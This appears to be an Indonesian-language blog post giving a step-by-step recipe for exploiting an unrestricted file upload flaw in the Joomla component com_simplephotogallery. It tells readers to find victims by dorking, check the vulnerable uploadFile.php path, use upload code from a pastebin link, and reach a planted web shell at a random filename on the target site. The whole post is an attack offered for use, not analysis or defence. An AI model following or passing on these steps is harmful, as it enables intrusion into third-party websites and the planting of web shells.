Exploit : /administrator/components/com_simplephotogallery/lib/uploadFile.php
Step by Step :
Dorking
Pilih web Masukkan Exploit Jadi
Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini :
20. $fieldName = 'uploadfile';
87. $fileTemp = $_FILES[$fieldName]['tmp_name'];
94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96. if(! move_uploaded_file($fileTemp, $uploadPath))
Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code di
http://pastebin.com/raw/jSrVDRNR
Name Shell jadi Random contoh ->Shell__g4nt3n9.php
Shell Access : http://target.com/Shell__(RandomString).php
0 Komentar